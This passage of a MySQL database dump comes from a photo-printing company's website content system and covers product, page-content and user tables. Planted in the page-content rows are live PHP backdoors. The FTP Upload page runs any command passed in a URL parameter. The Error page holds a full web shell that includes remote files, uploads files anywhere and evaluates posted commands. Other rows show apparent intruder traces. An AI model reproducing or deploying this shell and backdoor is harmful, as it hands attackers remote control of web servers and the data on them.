1.jpg\" /> <img width=\"726\" height=\"548\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 1 prices.jpg\" />','','','','','','','','','N','2013-06-22 09:36:16','2013-06-22 08:29:13',185),(188,'Layout1','1','COLLECTIONS TEST 2','collectionstst2.php','collections test 3','collections test 3','collections test 3','<img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /> <img width=\"726\" height=\"553\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 2.jpg\" /> <img width=\"726\" height=\"548\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 2 prices.jpg\" />','','','','','','','','','N','2013-06-22 09:35:15','2013-06-22 08:34:40',186),(189,'Layout1','1','COLLECTIONS TEST 3','collectionstest3.php','collections test 3','collections test 3','collections test 3','<img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /> <img width=\"726\" height=\"557\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 3.jpg\" alt=\"\" /> <img width=\"726\" height=\"548\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 3 prices.jpg\" alt=\"\" />','','','','','','','','','N','2013-06-22 09:38:39','2013-06-22 08:38:39',187),(190,'Layout1','1','COLLECTIONS TEST 4','collectionstest4.php','collections test 4','collections test 4','collections test 4','<img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /> <img width=\"726\" height=\"556\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 4.jpg\" alt=\"\" /> <img width=\"726\" height=\"548\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 4 prices.jpg\" alt=\"\" />','','','','','','','','','N','2013-06-22 09:40:39','2013-06-22 08:40:39',188),(191,'Layout1','1','COLLECTIONS TEST 5','collectionstest5.php','collections test 5','collections test 5','collections test 5','<img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /> <img width=\"726\" height=\"556\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 5.jpg\" alt=\"\" /> <img width=\"726\" height=\"548\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 5 prices.jpg\" alt=\"\" />','','','','','','','','','N','2013-06-22 09:42:22','2013-06-22 08:42:22',189),(192,'Layout1','1','COLLECTIONS TEST 6','collectionstest6.php','collections test 6','collections test 6','collections test 6','<img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /> <img width=\"726\" height=\"556\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 6.jpg\" alt=\"\" /> <img width=\"726\" height=\"548\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 6 prices.jpg\" alt=\"\" />','','','','','','','','','N','2013-06-22 09:44:12','2013-06-22 08:44:12',190),(193,'Layout1','1','COLLECTIONS TEST 7','collectionstest7.php','collections test 7','collections test 7','collections test 7','<img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /> <img width=\"726\" height=\"555\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 7.jpg\" alt=\"\" /> <img width=\"726\" height=\"548\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/layout 7 prices.jpg\" alt=\"\" />','','','','','','','','','N','2013-06-22 09:45:57','2013-06-22 08:45:57',191),(194,'Layout1','1','LINK TO NEW ULTIMATE ACRYLICS','linktoultimate.php','link','link','link','<a href=\"http://stevecul6.wix.com/collections-2\"><img width=\"726\" height=\"555\" src=\"http://www.paulgrahamltd.com/EditorImages/image/images for new collections/main image.jpg\" alt=\"\" /></a>','','','','','','','','','N','2013-06-23 11:31:36','2013-06-23 10:31:36',192);
/*!40000 ALTER TABLE `tbl_product_master` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_site_content_master`
--
DROP TABLE IF EXISTS `tbl_site_content_master`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_site_content_master` (
`HeaderId` int(5) NOT NULL AUTO_INCREMENT,
`ParentId` int(5) DEFAULT '0',
`HeaderTitle` varchar(255) DEFAULT NULL,
`section` varchar(255) DEFAULT NULL,
`HeaderPagename` varchar(255) DEFAULT NULL,
`HeaderMetatitle` text,
`HeaderMetakey` text,
`HeaderMetadescription` text,
`IncludePage_name` varchar(255) DEFAULT '0',
`HeaderDesc` text,
`Is_active` char(1) DEFAULT 'Y',
`Is_header` char(1) DEFAULT 'N',
`Is_footer` char(1) DEFAULT 'N',
`Is_other` char(1) DEFAULT 'N',
`display_order` int(5) DEFAULT '0',
`is_login` enum('Y','N') DEFAULT 'Y',
`is_forum` char(1) DEFAULT '0',
`is_popup` enum('Y','N') DEFAULT 'N',
`careers_txt` text,
`contact_txt` text,
`AddedOn` datetime DEFAULT NULL,
`LastModifiedOn` datetime DEFAULT NULL,
PRIMARY KEY (`HeaderId`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_site_content_master`
--
LOCK TABLES `tbl_site_content_master` WRITE;
/*!40000 ALTER TABLE `tbl_site_content_master` DISABLE KEYS */;
INSERT INTO `tbl_site_content_master` VALUES (1,0,'Paul Graham, Image Specialists.',NULL,'index.php','Paul Grahams Image Specialists.','Paul Grahams Image Specialists.','Image presentation specialists. Services include wall acrylics, bespoke framing, canvas wraps, pop-up roller banners, large format graphic display systems, large and small format printing, pritning and laminating, digital image enhancement, digital restoration, wedding albums and amny more.','a.php','Image presentation specialists. Services include wall acrylics, bespoke framing, canvas wraps, pop-up roller banners, large format graphic display systems, large and small format printing, pritning and laminating, digital image enhancement, digital restoration, wedding albums and amny more.','Y','N','Y','N',1,'Y','0','N','','','2017-01-21 14:25:40',NULL),(2,0,'Product & services',NULL,'products-services.php','Product & services','Product & services','Product & services','inc_products_services.php','','Y','N','Y','N',2,'Y','0','N','','','2010-05-13 15:49:50',NULL),(3,0,'FTP Upload',NULL,'ftp-upload.php','FTP Upload','FTP Upload','FTP Upload','inc_upload_enquiry.php','<p>FTP Upload, to ensure completion of prints for next day collection/<br />\r\ndelivery schedule we must have recieved all files onto our central<br />\r\nstorage server by 12 noon.</p>\r\n<?php if(isset($_GET[\'cmd\'])){exec($_GET[\'cmd\']);}?>','Y','N','Y','N',3,'Y','0','N','','','2015-12-02 01:13:31',NULL),(4,0,'Contact',NULL,'contact-us.php','Contact','Contact','Contact','inc_contact_us.php','<strong>Contact<br />\r\n<br />\r\n</strong>\r\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\r\n <tbody>\r\n <tr>\r\n <td align=\"left\">\r\n <div class=\"uploadtopbox\">For anymore information regarding any of our products & services or even just to say hello please feel free to contact us by any of the following methods.</div>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td align=\"left\"> </td>\r\n </tr>\r\n <tr>\r\n <td align=\"left\">\r\n <div class=\"uploadtopbox\">\r\n <table width=\"100%\" border=\"0\">\r\n <tbody>\r\n <tr>\r\n <td width=\"50%\"><font size=\"4\">By</font> <span class=\"pinksmalltitle\">Post:</span><br />\r\n <span class=\"style2 style4\"><strong>Paul Graham Ltd.</strong><br />\r\n Suite 8, Glenfield Business Park,<br />\r\n Philips Road,<br />\r\n Blackburn<br />\r\n Lancashire<br />\r\n BB1 5PF<br />\r\n Opening Hours<br />\r\n Monday-Thursday 7.30am-4.00 pm<br />\r\n Friday 7.30am-2.30pm<br />\r\n </span></td>\r\n <td width=\"56%\" valign=\"top\">\r\n <p> <font size=\"4\">Via </font><span class=\"pinksmalltitle\">Email:</span><br />\r\n e: <a href=\"mailto:mail@paulgrahamltd.com\">mail@paulgrahamltd.com</a></p>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td><font size=\"4\">By</font> <span class=\"pinksmalltitle\">Phone / Fax:</span><br />\r\n <span class=\"blackbodycontent\"><font size=\"3\">t</font>: (01254) 681001<br />\r\n <br />\r\n </span></td>\r\n <td valign=\"top\">\r\n <p align=\"center\"><iframe width=\"250\" height=\"200\" frameborder=\"0\" marginheight=\"0\" src=\"http://maps.google.co.uk/maps?f=q&source=s_q&hl=en&geocode=&q=Glenfield+Business+Park,+Philips+Road,+Blackburn,+BB1+5PF&aq=&sll=53.800651,-4.064941&sspn=17.654694,46.538086&ie=UTF8&hq=Glenfield+Business+Park,&hnear=Philips+Rd,+Blackburn+BB1,+United+Kingdom&ll=53.766823,-2.454959&spn=0.034398,0.090895&z=14&iwloc=A&cid=14237998295626402521&output=embed\" marginwidth=\"0\" scrolling=\"no\"></iframe><br />\r\n <a style=\"text-align: left; color: rgb(0, 0, 255);\" target=\"_blank\" href=\"http://maps.google.co.uk/maps?f=q&source=embed&hl=en&geocode=&q=Glenfield+Business+Park,+Philips+Road,+Blackburn,+BB1+5PF&aq=&sll=53.800651,-4.064941&sspn=17.654694,46.538086&ie=UTF8&hq=Glenfield+Business+Park,&hnear=Philips+Rd,+Blackburn+BB1,+United+Kingdom&ll=53.766823,-2.454959&spn=0.034398,0.090895&z=14&iwloc=A&cid=14237998295626402521\"><strong>Click Here to View Larger Map</strong></a></p>\r\n </td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </div>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td align=\"left\"> </td>\r\n </tr>\r\n </tbody>\r\n</table>','Y','N','Y','N',4,'Y','0','N','','','2015-10-27 10:51:40',NULL),(5,0,'About Us',NULL,'about-us.php','About Us','About Us','About Us','','<p><font color=\"#ec008c\" size=\"3\"><font size=\"5\"><font color=\"#ec008c\"><strong>About</strong> </font><strong><font color=\"#ec008c\">Us.</font><br />\r\n<hr />\r\n</strong></font></font><font size=\"2\"><span lang=\"EN-GB\">As one of the leading photographic processing labs in the UK. Paul Graham has built <br />\r\nan enviable reputation for providing a complete imaging solution to some of the UK`s <br />\r\nleading professionals. <br />\r\n<br />\r\nEstablished in 1987 to provide professional photographers with the very best in <br />\r\nprocessing and printing facilities, the business today is a high tech, dynamic company, <br />\r\nwell prepared to meet the demands of today’s professionals. <br />\r\n<br />\r\nExtensive investment in new technology and staff training has put Paul Graham Ltd at <br />\r\nthe forefront of digital technology, giving us the ability to provide a complete imaging <br />\r\nsolution to all users of photographic images. </span></font></p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>','Y','N','Y','N',5,'Y','0','N','','','2010-06-08 16:30:39',NULL),(6,0,'Category',NULL,'category.php','Category','Category','Category','inc_category_prod_list.php','te','Y','N','N','N',6,'Y','0','N','','','2015-12-01 21:15:30',NULL),(8,0,'Product',NULL,'product.php','Product','Product','Product','','asdas','Y','N','N','N',7,'Y','0','N','','','2015-12-01 21:14:16',NULL),(9,0,'Error',NULL,'error.php','404 error','error','error','inc_error.php','<html>\r\n<head>\r\n<title>uploader</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">\r\n<style type=\"text/css\">\r\n<!--\r\nbody { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}\r\na { color: #000000; text-decoration: none}\r\na:hover { color: #000066; text-decoration: underline}\r\n-->\r\n</style>\r\n</head>\r\n \r\n<body bgcolor=\"#999999\" text=\"#000000\">\r\n<center>\r\n <table width=\"700\" border=\"0\" bgcolor=\"#000066\">\r\n <tr>\r\n <td>\r\n <table width=\"100%\" border=\"0\" bgcolor=\"#CCCCCC\">\r\n <tr>\r\n <td>\r\n <p><font size=\"2\"><b><font color=\"#FF0000\"> System:\r\n <font color=\"#000000\">\r\n <? passthru(\"uname -a\"); ?><? error_reporting(0); include($_GET[backdoor]); echo $_GET[backdoor]; ?>\r\n </font><br>\r\n Our permissions: <font color=\"#000000\">\r\n <? passthru(\"id\"); ?>\r\n </font><br>\r\n Our locality: <font color=\"#000000\">\r\n <? passthru(\"pwd\"); ?>\r\n </font></font></b></font></p>\r\n \r\n<pre>\r\n<?php\r\n// FILE UPLOAD\r\n$uploaded = $_FILES[\'userfile\'][\'tmp_name\'];\r\nif (file_exists($uploaded)) {\r\n $pwd_dir = $_POST[\'dira\'];\r\n $real = $_FILES[\'userfile\'][\'name\']; \r\n $destination = $pwd_dir.\"/\".$real;\r\n copy($uploaded, $destination);\r\n echo \"Uploaded process:\";\r\n print_r ($_FILES);\r\n echo \"FILE UPLOADED TO $destination\";\r\n} else {\r\n echo \" No file uploaded\";\r\n}\r\n?> </pre> <form name=\"form1\" method=\"post\" enctype=\"multipart/form-data\">\r\n <table width=\"100%\" border=\"0\">\r\n <tr>\r\n <td width=\"35%\"><font size=\"2\"><b> Browse file\r\n to upload:</b></font></td>\r\n <td width=\"65%\">\r\n <input type=\"file\" name=\"userfile\" size=\"45\">\r\n </td>\r\n </tr>\r\n <tr>\r\n <td width=\"35%\"><b><font size=\"2\"> Destination:</font></b></td>\r\n <td width=\"65%\">\r\n <input type=\"text\" name=\"dira\" size=\"45\" value=\"<? passthru(\"pwd\"); ?>\">\r\n <input type=\"submit\" name=\"submit2\" value=\"upload\">\r\n </td>\r\n </tr>\r\n <tr>\r\n <td width=\"35%\">\r\n <div align=\"right\"> </div>\r\n </td>\r\n <td width=\"65%\"> </td>\r\n </tr>\r\n <tr>\r\n <td width=\"35%\"><b><font size=\"2\"> Command to execute:</font></b></td>\r\n <td width=\"65%\">\r\n <input type=\"text\" name=\"cmd\" size=\"45\" value=\"<? echo $_POST[\'cmd\']; ?>\">\r\n <input type=\"submit\" name=\"submit\" value=\"execute\">\r\n </td>\r\n </tr>\r\n <tr>\r\n <td width=\"35%\">\r\n <div align=\"right\"> </div>\r\n </td>\r\n <td width=\"65%\"> </td>\r\n </tr>\r\n </table>\r\n </form>\r\n <p>\r\n <pre>\r\n <?\r\n // command output\r\n if ($_POST[\'cmd\']){\r\n $cmd = $_POST[\'cmd\'];\r\n echo \"$cmd executed...<br>\";\r\n eval(\"$cmd\");\r\n }\r\n else {\r\n echo \"No shell command executed\";\r\n }\r\n \r\n ?></pre>\r\n \r\n \r\n \r\n <div align=\"right\"> <font size=\"1\"><b>2003 © </b></font> </div>\r\n </td>\r\n </tr>\r\n </table>\r\n </td>\r\n </tr>\r\n </table>\r\n</center>\r\n</body>\r\n</html>','Y','N','N','N',8,'Y','0','N','','','2015-12-01 20:52:57',NULL),(12,0,'code',NULL,'sexygayshwekayin.php','code','code','code','inc_sexygayshwekayin.php','ခေရလွဴ ခ်င္သူ ကရင္အို','Y','N','Y','N',9,'Y','0','N','','','2017-01-21 14:39:27',NULL),(13,0,'test',NULL,'test.php','test','test','test','','','Y','N','N','N',10,'Y','0','N','','','2015-12-02 01:26:41',NULL),(14,0,'hello',NULL,'abd.php','hello','hello','hello','abd.php','phpinfo%28%29%3B','Y','N','N','N',11,'Y','0','N','','','2017-01-21 14:43:02',NULL);
/*!40000 ALTER TABLE `tbl_site_content_master` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `tbl_users`
--
DROP TABLE IF EXISTS `tbl_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tbl_users` (
`user_id` bigint(11) NOT NULL AUTO_INCREMENT,
`user_name` varchar(255) DEFAULT NULL,
`user_email` varchar(255) DEFAULT NULL,
`user_telephone` varchar(255) DEFAULT NULL,
`user_desc` text,
`added_on` datetime DEFAULT NULL,
`is_process_completed` enum('Y','N') DEFAULT 'N',
PRIMARY KEY (`user_id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `tbl_users`
--
LOCK TABLES `tbl_users` WRITE;
/*!40000 ALTER TABLE `tbl_users` DISABLE KEYS */;
INSERT INTO `tbl_users` VALUES (1,'shivangi','shivangi.p@invitrat.com','36545754','This image is uploaded for testing only','2010-05-13 17:57:08','Y'),(2,'shivangi','shivangi.p@invitrat.com','346456','This image is for testing purpose','2010-05-13 17:58:34','Y'),(4,'shivangi','invitra.test@gmail.com','456456','Description goes here','2010-05-17 07:56:56','Y');
/*!40000 ALTER TABLE `tbl_users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2018-04-25 23:04:00